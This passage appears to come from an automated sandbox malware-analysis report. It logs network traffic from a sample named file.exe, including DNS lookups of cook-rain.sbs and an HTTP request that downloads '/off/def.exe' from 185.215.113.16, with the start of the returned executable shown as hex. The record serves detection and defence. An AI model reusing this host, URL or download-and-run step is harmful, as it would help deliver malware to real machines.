                                                                                                                                                                      Nov 21, 2024 06:25:16.073543072 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.127465010 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.128654003 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.128669977 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.129131079 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.129134893 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.591778040 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.591805935 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.591975927 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.591989994 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.592065096 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.592211008 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.592211008 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.592216969 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.592408895 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.592446089 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.592485905 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.594852924 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.594907045 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.594989061 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.595129013 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.595149040 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.392054081 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.392568111 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.392592907 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.393038034 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.393045902 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.523175955 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.523672104 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.523705006 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.524127007 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.524135113 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.541050911 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.541522980 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.541532993 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.541932106 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.541939974 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.797493935 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.798059940 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.798101902 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.798568010 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.798582077 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.841939926 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.841964006 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.842015028 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.842041969 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.842303038 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.842338085 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.842360020 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.842503071 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.842535019 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.842580080 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.845037937 CET50056443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.845079899 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.845150948 CET50056443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.845339060 CET50056443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.845356941 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.960989952 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.961066008 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.961126089 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.961432934 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.961461067 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.961473942 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.961482048 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.964232922 CET50057443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.964288950 CET4435005713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.964420080 CET50057443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.964544058 CET50057443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.964576006 CET4435005713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.985122919 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.988147020 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.988217115 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.988271952 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.988271952 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.988285065 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.988292933 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.990890026 CET50058443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.990926981 CET4435005813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:17.990988970 CET50058443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.991130114 CET50058443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:17.991142988 CET4435005813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.247970104 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.251168966 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.251236916 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.255234003 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.255249977 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.255259991 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.255264997 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.259335995 CET50059443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.259418964 CET4435005913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.259501934 CET50059443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.259789944 CET50059443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.259823084 CET4435005913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.401411057 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.406224012 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.406267881 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.407224894 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.407233000 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.844615936 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.848026037 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.850002050 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.850048065 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.850048065 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.850069046 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.850083113 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.852895975 CET50060443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.852938890 CET4435006013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:18.853015900 CET50060443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.853199959 CET50060443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:18.853219986 CET4435006013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:19.626560926 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:19.627003908 CET50056443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:19.627037048 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:19.627500057 CET50056443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:19.627505064 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:19.684566021 CET4435005713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:19.685250044 CET50057443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:19.685276031 CET4435005713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:19.685847998 CET50057443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:19.685856104 CET4435005713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:19.776671886 CET4435005813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:19.777288914 CET50058443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:19.777316093 CET4435005813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:19.777888060 CET50058443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:19.777894020 CET4435005813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.044842958 CET4435005913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.045352936 CET50059443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.045413017 CET4435005913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.045928955 CET50059443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.045937061 CET4435005913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.077053070 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.080224991 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.080281973 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.080281973 CET50056443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.080328941 CET50056443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.080394030 CET50056443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.080415964 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.080430031 CET50056443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.080435038 CET4435005613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.118849993 CET4435005713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.121993065 CET4435005713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.122075081 CET50057443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.122147083 CET50057443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.122147083 CET50057443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.122185946 CET4435005713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.122210026 CET4435005713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.220006943 CET4435005813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.223200083 CET4435005813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.223334074 CET50058443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.223373890 CET50058443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.223392963 CET4435005813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.223424911 CET50058443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.223431110 CET4435005813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.488888025 CET4435005913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.491978884 CET4435005913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:20.492108107 CET50059443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.492108107 CET50059443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.492592096 CET50059443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:20.492614031 CET4435005913.107.246.45192.168.2.6
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 21, 2024 06:23:12.890563965 CET6077053192.168.2.61.1.1.1
                                                                                                                                                                      Nov 21, 2024 06:23:13.133827925 CET53607701.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.043565035 CET53516211.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.138765097 CET53632061.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.449204922 CET53611481.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.568470955 CET5755953192.168.2.61.1.1.1
                                                                                                                                                                      Nov 21, 2024 06:23:52.568664074 CET5058053192.168.2.61.1.1.1
                                                                                                                                                                      Nov 21, 2024 06:23:52.794034958 CET53575591.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.794060946 CET53505801.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.181668043 CET5568453192.168.2.61.1.1.1
                                                                                                                                                                      Nov 21, 2024 06:23:56.181969881 CET5506353192.168.2.61.1.1.1
                                                                                                                                                                      Nov 21, 2024 06:24:04.005876064 CET5436253192.168.2.61.1.1.1
                                                                                                                                                                      Nov 21, 2024 06:24:04.005876064 CET6457653192.168.2.61.1.1.1
                                                                                                                                                                      Nov 21, 2024 06:24:04.596606016 CET53627771.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:08.828243017 CET53501601.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.922806025 CET53502631.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.204982996 CET53561801.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.626199961 CET53586581.1.1.1192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:04.008763075 CET5121653192.168.2.61.1.1.1
                                                                                                                                                                      Nov 21, 2024 06:25:04.009170055 CET5098953192.168.2.61.1.1.1
                                                                                                                                                                      Nov 21, 2024 06:25:17.499691010 CET53584151.1.1.1192.168.2.6
                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 21, 2024 06:23:12.890563965 CET192.168.2.61.1.1.10x4e2bStandard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:52.568470955 CET192.168.2.61.1.1.10xb3ccStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:52.568664074 CET192.168.2.61.1.1.10x2afStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.181668043 CET192.168.2.61.1.1.10xdbb3Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.181969881 CET192.168.2.61.1.1.10xb33dStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:24:04.005876064 CET192.168.2.61.1.1.10x8f37Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:24:04.005876064 CET192.168.2.61.1.1.10xdc4dStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:25:04.008763075 CET192.168.2.61.1.1.10xd7baStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:25:04.009170055 CET192.168.2.61.1.1.10x6faaStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 21, 2024 06:23:13.133827925 CET1.1.1.1192.168.2.60x4e2bNo error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:13.133827925 CET1.1.1.1192.168.2.60x4e2bNo error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:52.794034958 CET1.1.1.1192.168.2.60xb3ccNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:52.794060946 CET1.1.1.1192.168.2.60x2afNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.406691074 CET1.1.1.1192.168.2.60x559No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.406691074 CET1.1.1.1192.168.2.60x559No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.406691074 CET1.1.1.1192.168.2.60x559No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.407114983 CET1.1.1.1192.168.2.60xdbb3No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.407114983 CET1.1.1.1192.168.2.60xdbb3No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.407114983 CET1.1.1.1192.168.2.60xdbb3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.407114983 CET1.1.1.1192.168.2.60xdbb3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.407284021 CET1.1.1.1192.168.2.60xecc6No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.408395052 CET1.1.1.1192.168.2.60xb33dNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:56.408395052 CET1.1.1.1192.168.2.60xb33dNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:59.284262896 CET1.1.1.1192.168.2.60x8c53No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:59.284569025 CET1.1.1.1192.168.2.60x9091No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:59.284569025 CET1.1.1.1192.168.2.60x9091No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:23:59.284569025 CET1.1.1.1192.168.2.60x9091No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:24:04.231925011 CET1.1.1.1192.168.2.60x8f37No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:24:04.233644009 CET1.1.1.1192.168.2.60xdc4dNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:25:04.236232996 CET1.1.1.1192.168.2.60xd7baNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 21, 2024 06:25:04.236370087 CET1.1.1.1192.168.2.60x6faaNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      • cook-rain.sbs
                                                                                                                                                                      • otelrules.azureedge.net
                                                                                                                                                                      • slscr.update.microsoft.com
                                                                                                                                                                      • fs.microsoft.com
                                                                                                                                                                      • https:
                                                                                                                                                                        • js.monitor.azure.com
                                                                                                                                                                        • wcpstatic.microsoft.com
                                                                                                                                                                      • 185.215.113.16
                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.649762185.215.113.16801600C:\Users\user\Desktop\file.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 21, 2024 06:23:35.735441923 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Host: 185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:37.067737103 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:36 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 2772480
                                                                                                                                                                      Last-Modified: Thu, 21 Nov 2024 05:10:53 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "673ec0dd-2a4e00"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2b 00 00 04 00 00 e4 bc 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                      Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ +*`Ui` @ @.rsrc`2@.idata 8@jbjemqme*):@ploemuvx *&*@.taggant@*",*@
                                                                                                                                                                      Nov 21, 2024 06:23:37.067783117 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 21, 2024 06:23:37.068806887 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 21, 2024 06:23:37.068828106 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 21, 2024 06:23:37.068844080 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
